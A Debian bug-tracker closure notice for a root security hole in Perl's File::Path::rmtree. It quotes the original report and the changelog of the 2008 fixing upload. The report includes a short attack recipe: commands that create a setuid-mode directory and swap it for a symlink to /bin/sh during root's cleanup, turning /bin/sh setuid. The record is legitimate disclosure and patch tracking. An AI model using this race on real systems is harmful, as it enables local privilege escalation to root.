Bug#286905: marked as done (perl-modules: File::Path::rmtree makes setuid)

[Debian Bug Tracking System]

Your message dated Fri, 09 Jan 2009 01:52:21 +0000
with message-id <e1ll6xt-0006a4...@ries.debian.org>
and subject line Bug#286905: fixed in perl 5.8.8-7etch5
has caused the Debian Bug report #286905,
regarding perl-modules: File::Path::rmtree makes setuid
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
286905: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=286905
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

--- Begin Message ---

Package: perl-modules
Version: 5.6.1-8.7
Severity: critical
File: /usr/share/perl/5.6.1/File/Path.pm
Tags: security
Justification: root security hole

Noting USN-44-1 e.g. in

  http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0385.html

I looked in perl-N.N.N/lib/File/Path.pm and noticed that rmtree contains
a race condition, allowing creation of setuid files:

   170          (undef, undef, my $rp) = lstat $root or next;
   171          $rp &= 07777;   # don't forget setuid, setgid, sticky bits
   172          if ( -d _ ) {
   ...
   209              if (rmdir $root) {
   210                  ++$count;
   211              }
   212              else {
   213                  carp "Can't remove directory $root: $!";
   214                  chmod($rp, ($Is_VMS ? VMS::Filespec::fileify($root) : 
$root))
   215                      or carp("and can't restore permissions to "
   216                              . sprintf("0%o",$rp) . "\n");
   217              }
   218          }
   ...

Example of attack: suppose we know that root uses rmtree to clean up
/tmp directories. Attacker prepares things:

  mkdir -p /tmp/psz/sh
  perl -e 'open F, ">/tmp/psz/sh/$_" foreach (1..1000)'
  chmod 4777 /tmp/psz/sh

While root is busy working on /tmp/psz/sh (and this can be made as slow
as we like), attacker does:

  mv /tmp/psz/sh /tmp/psz/dummy
  ln -s /bin/sh /tmp/psz/sh

Root would have recorded the permissions of /tmp/psz/sh, but would
"restore" it to /bin/sh.

I am not sure if things can almost be fixed (for those architectures
without $force_writeable) by enclosing the chmod($rp,...) line within
if(!safe|$force_writeable){...}. Maybe it should be documented that
rmtree must only be used if you can be sure to have exclusive access to
the tree.

(A few minutes ago I emailed the File::Path authors tim.bu...@ig.co.uk
and bai...@newman.upenn.edu; Tim.Bunce bounced.)

Cheers,

Paul Szabo - p...@maths.usyd.edu.au  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics  University of Sydney   2006  Australia


-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux pisa.maths.usyd.edu.au 2.4.22-smssvr1.5.3 #1 SMP Wed Jun 23 
13:01:39 EST 2004 i686
Locale: LANG=C, LC_CTYPE=C

Versions of packages perl-modules depends on:
ii  perl                          5.6.1-8.7  Larry Wall's Practical Extraction 

--- End Message ---

--- Begin Message ---

Source: perl
Source-Version: 5.8.8-7etch5

We believe that the bug you reported is fixed in the latest version of
perl, which is due to be installed in the Debian FTP archive:

libcgi-fast-perl_5.8.8-7etch5_all.deb
  to pool/main/p/perl/libcgi-fast-perl_5.8.8-7etch5_all.deb
libperl-dev_5.8.8-7etch5_i386.deb
  to pool/main/p/perl/libperl-dev_5.8.8-7etch5_i386.deb
libperl5.8_5.8.8-7etch5_i386.deb
  to pool/main/p/perl/libperl5.8_5.8.8-7etch5_i386.deb
perl-base_5.8.8-7etch5_i386.deb
  to pool/main/p/perl/perl-base_5.8.8-7etch5_i386.deb
perl-debug_5.8.8-7etch5_i386.deb
  to pool/main/p/perl/perl-debug_5.8.8-7etch5_i386.deb
perl-doc_5.8.8-7etch5_all.deb
  to pool/main/p/perl/perl-doc_5.8.8-7etch5_all.deb
perl-modules_5.8.8-7etch5_all.deb
  to pool/main/p/perl/perl-modules_5.8.8-7etch5_all.deb
perl-suid_5.8.8-7etch5_i386.deb
  to pool/main/p/perl/perl-suid_5.8.8-7etch5_i386.deb
perl_5.8.8-7etch5.diff.gz
  to pool/main/p/perl/perl_5.8.8-7etch5.diff.gz
perl_5.8.8-7etch5.dsc
  to pool/main/p/perl/perl_5.8.8-7etch5.dsc
perl_5.8.8-7etch5_i386.deb
  to pool/main/p/perl/perl_5.8.8-7etch5_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 286...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Niko Tyni <nt...@debian.org> (supplier of updated perl package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Thu, 20 Nov 2008 22:45:54 +0200
Source: perl
Binary: perl-base libcgi-fast-perl libperl-dev perl-debug perl-modules perl 
libperl5.8 perl-suid perl-doc
Architecture: source i386 all
Version: 5.8.8-7etch5
Distribution: stable-security
Urgency: high
Maintainer: Brendan O'Dea <b...@debian.org>
Changed-By: Niko Tyni <nt...@debian.org>
Description: 
 libcgi-fast-perl - CGI::Fast Perl module
 libperl-dev - Perl library: development files
 libperl5.8 - Shared Perl library
 perl       - Larry Wall's Practical Extraction and Report Language
 perl-base  - The Pathologically Eclectic Rubbish Lister
 perl-debug - Debug-enabled Perl interpreter
 perl-doc   - Perl documentation
 perl-modules - Core Perl modules
 perl-suid  - Runs setuid Perl scripts
Closes: 286905 286922
Changes: 
 perl (5.8.8-7etch5) stable-security; urgency=high
 .
   * SECURITY [CAN-2005-0448]: re-rewrite File::Path::rmtree to avoid race
     condition which allows an attacker with write permission on
     directories in the tree being removed to make files setuid or to
     remove arbitrary files (Closes: #286905, #286922).
     .
     The race condition was fixed in 5.8.4-7 but re-introduced in 5.8.8-1.
Files: 
 a57837967b7420057558cab7efca9202 750 perl standard perl_5.8.8-7etch5.dsc
 cfd4c3d27c5a7a342c441383867dae89 105052 perl standard perl_5.8.8-7etch5.diff.gz
 9dfa8758852aadcaadb2edbdfa17f942 41082 perl optional 
libcgi-fast-perl_5.8.8-7etch5_all.deb
 3baade38d4a703ae7db0e2f7d7b2df62 7378812 doc optional 
perl-doc_5.8.8-7etch5_all.deb
 dc45e7d6fbedf992db42f31326457df2 2316518 perl standard 
perl-modules_5.8.8-7etch5_all.deb
 40254226d8ae5963a908661350816f0c 762200 perl required 
perl-base_5.8.8-7etch5_i386.deb
 7149381d9862cc1ebd20092fae76dda9 2491980 perl optional 
perl-debug_5.8.8-7etch5_i386.deb
 59d70d1ee4f0e7584230095ca079ceb7 32070 perl optional 
perl-suid_5.8.8-7etch5_i386.deb
 c511226a2cbddb98a170c8f563d6670a 527162 libs optional 
libperl5.8_5.8.8-7etch5_i386.deb
 f3f34d325de643667d4c12f897a15f48 585396 libdevel optional 
libperl-dev_5.8.8-7etch5_i386.deb
 bdcb99ed51d06b1639d98a661ce42d58 3589118 perl standard 
perl_5.8.8-7etch5_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkkxTPsACgkQiyizGWoHLTn0OgCdGI24OjO5S7gb+Vh2qRcSOJYL
U7gAnRXL7Wbcotrdf0cWNYj4zbMweEj5
=8aRt
-----END PGP SIGNATURE-----

--- End Message ---